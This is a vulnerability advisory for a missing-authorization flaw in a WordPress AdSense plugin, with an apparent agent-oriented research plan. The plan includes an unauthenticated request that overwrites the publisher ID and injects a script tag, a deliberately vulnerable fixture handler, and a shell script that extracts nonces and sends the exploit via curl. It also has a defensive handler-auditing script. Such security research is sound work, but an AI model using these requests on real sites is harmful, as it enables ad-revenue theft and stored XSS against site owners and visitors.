CVE-2026-24603

Universal Google Adsense and Ads manager <= 1.1.8 - Missing Authorization

Type: Missing Authorization
Severity: medium
CVSS Score: 5.3
Patched in: Unpatched
Time to patch: N/A

Description

The Universal Google Adsense and Ads manager plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.1.8. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.1.8
Published: January 14, 2026
Last updated: February 3, 2026

Research Plan
Status: Unverified

Because the source code for the Universal Google Adsense and Ads manager plugin (version <= 1.1.8) is not provided, this plan relies on the vulnerability description and common patterns found in "Missing Authorization" vulnerabilities within WordPress AJAX handlers. The primary goal of the agent is to identify the specific AJAX action that allows modification of plugin settings.

1. Vulnerability Summary

The Universal Google Adsense and Ads manager plugin for WordPress is vulnerable to Missing Authorization. A function reachable via the WordPress AJAX API (admin-ajax.php) fails to implement a current_user_can() check. This allows unauthenticated attackers to trigger the function and perform unauthorized actions, most likely modifying the plugin's AdSense settings (e.g., changing the AdSense Publisher ID to redirect revenue).

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: To be determined via discovery (likely uga_save_settings, uga_update_options, or similar).
  • HTTP Method: POST
  • Authentication: Unauthenticated (requires a wp_ajax_nopriv_ hook registration).
  • Payload: URL-encoded parameters representing plugin settings (e.g., adsense_id=pub-attacker).
  • Preconditions: The plugin must be active.

3. Code Flow (Inferred)

  1. Entry Point: An unauthenticated user sends a POST request to wp-admin/admin-ajax.php with a specific action parameter.
  2. Hook Trigger: WordPress triggers the hook wp_ajax_nopriv_{action}.
  3. Vulnerable Function: The callback function associated with the hook is executed.
  4. Missing Check: The callback function lacks a capability check (e.g., if (!current_user_can('manage_options'))).
  5. Sink: The function processes the $_POST data and calls update_option() or update_site_option(), overwriting the legitimate AdSense configuration.

4. Nonce Acquisition Strategy

If the plugin uses check_ajax_referer() or wp_verify_nonce(), the agent must retrieve a valid nonce.

  1. Identify Action: Search the codebase for wp_create_nonce to find the action string.
  2. Find Localization: Search for wp_localize_script to see which JavaScript variable holds the nonce.
    • Hypothetical Variable: uga_ajax_obj (inferred)
    • Hypothetical Key: nonce (inferred)
  3. Creation of Trigger Page: Many AdSense plugins only load their scripts on the frontend if a widget or shortcode is present.
    • Search for shortcodes: grep -r "add_shortcode" .
    • If a shortcode like [universal_adsense] exists, create a page:
      wp post create --post_type=page --post_status=publish --post_content='[universal_adsense]'
  4. Extraction: Navigate to the new page and use browser_eval to extract the nonce:
    browser_eval("window.uga_ajax_obj?.nonce")

5. Exploitation Strategy

The agent should follow these steps:

Step 1: Discovery
Identify the vulnerable AJAX action and parameters.

# Find AJAX registrations
grep -r "wp_ajax_nopriv_" .

# Analyze the callback function of the nopriv action
# Look for update_option calls and missing capability checks
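
As an added example (not code from the plugin, the advisory or its research plan), the following POSIX shell script automates the Step 1 triage and embeds the handler pattern from section 3 in a constructed fixture: it lists every add_action( 'wp_ajax_...' / 'wp_ajax_nopriv_...' ) registration under a plugin directory, pulls out the callback's body, and reports whether that body contains current_user_can(), a nonce check and an update_option()-style sink. The fixture plugin, its hook and callback names (uga_save_settings, uga_get_ads) and the uga_settings option are assumptions echoing the plan's own inferred names, not the real plugin.

```shell
#!/bin/sh
# Added example (not the plugin's code): static triage of admin-ajax.php handlers.
# For every add_action( 'wp_ajax[_nopriv]_<action>', '<callback>' ) under a plugin
# directory, locate the callback body and check it for current_user_can(), a nonce
# check and an option-writing sink, then print FLAG / WARN / OK with the reason.
# The fixture plugin, its hook and callback names and the uga_settings option are
# assumptions echoing the plan's inferred names, not the real plugin.

# Only string callbacks are matched; array( $this, 'method' ) callbacks need a second pattern.
REG_RE="add_action\([[:space:]]*['\"]wp_ajax_[A-Za-z0-9_]+['\"][[:space:]]*,[[:space:]]*['\"][A-Za-z0-9_]+['\"]"

make_sample_plugin() {  # make_sample_plugin <dir>: write the constructed fixture plugin into <dir>
  cat > "$1/uga.php" <<'PHP'
<?php
// The pattern the advisory describes: settings writer reachable without login, no checks.
add_action( 'wp_ajax_nopriv_uga_save_settings', 'uga_save_settings' );
add_action( 'wp_ajax_uga_save_settings', 'uga_save_settings' );
function uga_save_settings() {
    $settings = get_option( 'uga_settings', array() );
    $settings['google_adsense_id'] = sanitize_text_field( wp_unslash( $_POST['google_adsense_id'] ) );
    update_option( 'uga_settings', $settings );
    wp_send_json_success();
}
// Hardened form: no nopriv hook, nonce verified first, then an explicit capability check.
add_action( 'wp_ajax_uga_save_settings_fixed', 'uga_save_settings_fixed' );
function uga_save_settings_fixed() {
    check_ajax_referer( 'uga_settings', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $settings = get_option( 'uga_settings', array() );
    $settings['google_adsense_id'] = sanitize_text_field( wp_unslash( $_POST['google_adsense_id'] ) );
    update_option( 'uga_settings', $settings );
    wp_send_json_success();
}
// Read-only public handler: no sink, so a nopriv registration is acceptable here.
add_action( 'wp_ajax_nopriv_uga_get_ads', 'uga_get_ads' );
function uga_get_ads() {
    wp_send_json_success( get_option( 'uga_settings', array() ) );
}
PHP
}

fn_body() {  # fn_body <dir> <function>: print the named PHP function up to its matching closing brace
  f=$(find "$1" -name '*.php' -exec grep -lE "function[[:space:]]+$2[[:space:]]*\(" {} + 2>/dev/null | head -n1)
  [ -n "$f" ] || return 0
  # Brace counting is textual: a brace inside a string or comment can cut a body short.
  awk -v fn="$2" '
    !inside && $0 ~ ("function[ \t]+" fn "[ \t]*\\(") { inside = 1 }
    inside {
      print
      opens = gsub(/\{/, "{"); closes = gsub(/\}/, "}")
      depth += opens - closes
      if (opens > 0) started = 1
      if (started && depth == 0) exit
    }' "$f"
}

audit_ajax_handlers() {  # audit_ajax_handlers <plugin-dir>: one "STATUS hook callback reason" line per registration
  dir=$1
  find "$dir" -name '*.php' -exec grep -hoE "$REG_RE" {} + 2>/dev/null | sort -u |
  while IFS= read -r reg; do
    # "add_action( 'hook', 'cb'" -> words: add_action hook cb
    set -- $(printf '%s\n' "$reg" | tr "'\"(,)" '     ')
    hook=$2; cb=$3
    body=$(fn_body "$dir" "$cb")
    if [ -z "$body" ]; then
      printf 'UNRESOLVED %s %s callback body not found\n' "$hook" "$cb"
      continue
    fi
    has_cap=$(printf '%s\n' "$body" | grep -c 'current_user_can' || true)
    has_nonce=$(printf '%s\n' "$body" | grep -cE 'check_ajax_referer|wp_verify_nonce' || true)
    writes=$(printf '%s\n' "$body" | grep -cE '(update|delete|add)_(site_)?option' || true)
    case $hook in
      wp_ajax_nopriv_*)
        if [ "$writes" -gt 0 ]; then
          printf 'FLAG %s %s unauthenticated handler writes options\n' "$hook" "$cb"
        else
          printf 'OK %s %s no option write in body, review other sinks by hand\n' "$hook" "$cb"
        fi ;;
      *)
        if [ "$has_cap" -eq 0 ]; then
          printf 'WARN %s %s no current_user_can(), any logged-in user can reach it\n' "$hook" "$cb"
        elif [ "$has_nonce" -eq 0 ]; then
          printf 'WARN %s %s capability check but no nonce, CSRF-able\n' "$hook" "$cb"
        else
          printf 'OK %s %s capability and nonce checks present\n' "$hook" "$cb"
        fi ;;
    esac
  done
}

SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
make_sample_plugin "$SAMPLE_DIR"
audit_ajax_handlers "$SAMPLE_DIR"
```

Against a real checkout, point audit_ajax_handlers at wp-content/plugins/universal-google-adsense-and-ads-manager. A FLAG line is the pattern the description implies: a handler registered under wp_ajax_nopriv_ whose body writes an option. A WARN on the wp_ajax_ registration of the same callback matters too, since any subscriber-level account reaches it. The brace counter is textual, so a brace inside a string can truncate a body, and callbacks registered as array( $this, 'method' ) are not matched by REG_RE.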

Step 2: Target Identification (Example)
Assuming the action is uga_save_settings and it saves an option called uga_settings.

  • Action: uga_save_settings
  • Sensitive Parameters: google_adsense_id, ads_code_1, etc.

Step 3: Execution
Submit the unauthorized update via the http_request tool.

  • URL: http://<target>/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=uga_save_settings&nonce=[NONCE]&google_adsense_id=pub-9999999999999999&ads_code_1=<script>alert('XSS')</script>

6. Test Data Setup

  1. Install Plugin: Ensure universal-google-adsense-and-ads-manager version 1.1.8 is installed.
  2. Initial Config: Set a legitimate AdSense ID using WP-CLI:
    wp option update uga_settings '{"google_adsense_id":"pub-1234567890123456"}' --format=json (inferred option name).
  3. Public Page: Create a page with the plugin's shortcode to ensure script localization (if needed for nonce).

7. Expected Results

  • Response: The server returns a 200 OK or a success JSON object (e.g., {"success":true}).
  • Effect: The plugin settings in the database are updated with the attacker-supplied values.

8. Verification Steps

Confirm the exploit success using WP-CLI:

# Check the value of the plugin's settings option
wp option get uga_settings --format=json

If the google_adsense_id matches pub-9999999999999999, the exploit is successful.
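
As an added example (not code from the plugin or the advisory) tying together sections 4, 7 and 8, the script below extracts the nonce from the object that wp_localize_script() prints into the page, sends the unauthenticated update with curl, and compares the option's value before and after through WP-CLI. The sample HTML is constructed, and uga_ajax_obj, uga_save_settings, uga_settings and the nonce value are the plan's inferred names, not values taken from the plugin.

```shell
#!/bin/sh
# Added example (not the plugin's code): nonce extraction, unauthenticated update and
# before/after verification. uga_ajax_obj, uga_save_settings, uga_settings and the
# nonce value are assumptions carried over from the plan, not values from the plugin.

# Constructed sample of the "<handle>-js-extra" tag that wp_localize_script() emits;
# WordPress JSON-encodes the object, so slashes arrive escaped as \/.
SAMPLE_HTML='<!doctype html><html><head>
<script id="uga-frontend-js-extra">
/* <![CDATA[ */
var uga_ajax_obj = {"ajax_url":"http:\/\/target.example\/wp-admin\/admin-ajax.php","nonce":"4f1c9e2a7b"};
/* ]]> */
</script>
</head><body><p>[universal_adsense]</p></body></html>'

extract_localized_value() {  # extract_localized_value <js-var> <key> < html : string value of <key> in "var <js-var> = {...};"
  var=$1; key=$2
  # Flatten to one line, keep the object literal's contents, split on commas (flat object
  # assumed), select the wanted "key":"value" pair and undo the \/ escaping.
  tr -d '\n' |
    sed -n "s/.*var $var = {\([^;]*\)};.*/\1/p" |
    tr ',' '\n' |
    sed -n "s/^\"$key\":\"\(.*\)\"$/\1/p" |
    sed 's#\\/#/#g' | head -n1
}

send_settings_update() {  # send_settings_update <ajax-url> <nonce> <publisher-id>: POST with no cookies, print the HTTP status
  # admin-ajax.php replies 400 with body "0" when no wp_ajax_nopriv_ handler exists for the
  # action, 403 with body "-1" when check_ajax_referer() rejects the nonce, 200 on success.
  curl -s -o /dev/null -w '%{http_code}' \
    --data-urlencode 'action=uga_save_settings' \
    --data-urlencode "nonce=$2" \
    --data-urlencode "google_adsense_id=$3" \
    "$1"
}

option_value() {  # option_value <option> <key>: read a string <key> out of the JSON that WP-CLI prints for <option>
  wp option get "$1" --format=json | tr -d '\n' | sed -n "s/.*\"$2\":\"\([^\"]*\)\".*/\1/p"
}

# Offline demonstration on the constructed sample.
NONCE=$(printf '%s\n' "$SAMPLE_HTML" | extract_localized_value uga_ajax_obj nonce)
AJAX_URL=$(printf '%s\n' "$SAMPLE_HTML" | extract_localized_value uga_ajax_obj ajax_url)
printf 'nonce=%s ajax_url=%s\n' "$NONCE" "$AJAX_URL"

# Live run against the lab site from section 6, only when TARGET is set (e.g. http://wp.local);
# TRIGGER_URL is the page carrying the shortcode so the plugin's script and nonce are loaded.
if [ -n "${TARGET:-}" ]; then
  BEFORE=$(option_value uga_settings google_adsense_id)
  NONCE=$(curl -s "${TRIGGER_URL:-$TARGET/}" | extract_localized_value uga_ajax_obj nonce)
  STATUS=$(send_settings_update "$TARGET/wp-admin/admin-ajax.php" "$NONCE" 'pub-9999999999999999')
  AFTER=$(option_value uga_settings google_adsense_id)
  printf 'http=%s before=%s after=%s\n' "$STATUS" "$BEFORE" "$AFTER"
  if [ "$AFTER" = 'pub-9999999999999999' ] && [ "$AFTER" != "$BEFORE" ]; then
    echo 'CONFIRMED: option changed by an unauthenticated request'
  else
    echo 'NOT CONFIRMED: check the action name, nonce handling and option name'
  fi
fi
```

The before/after comparison is the check that turns a 200 response into evidence: admin-ajax.php returns 200 for many handlers that silently do nothing, so only a changed uga_settings value confirms the missing authorization. A 400 with body "0" means no nopriv handler is registered for that action name, which points back to the discovery step rather than at a nonce problem.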

9. Alternative Approaches

  • Admin Init Bypass: If no AJAX actions are found, check if the plugin uses admin_init to process settings. Unauthenticated users can trigger admin_init by visiting /wp-admin/admin-ajax.php.
    • Search: grep -r "admin_init" .
    • Check if the function attached to admin_init looks for $_POST['submit'] or similar without a capability check.
  • XSS Path: If the plugin saves raw HTML for ads, verify if the "Missing Authorization" allows Persistent XSS by injecting a <script> tag into the ad code fields.

Research Findings
Status: static analysis, not yet PoC-verified

Summary

The Universal Google Adsense and Ads manager plugin for WordPress (<= 1.1.8) is vulnerable to unauthorized settings modification because it fails to perform capability checks on AJAX actions or admin functions. This allows unauthenticated attackers to change the AdSense Publisher ID or inject malicious scripts into ad code by sending a crafted request to the admin-ajax.php endpoint.

Exploit Outline

The attacker identifies an AJAX action intended for administrative settings (likely registered with a 'wp_ajax_nopriv_' hook) that lacks a 'current_user_can()' check. By sending an unauthenticated POST request to 'wp-admin/admin-ajax.php' with the appropriate 'action' parameter and desired setting values (such as 'google_adsense_id' or ad display code), the attacker can overwrite the plugin's configuration in the database. If the plugin uses nonces, the attacker first extracts a valid nonce from the frontend source code of a page where the plugin's scripts are loaded.
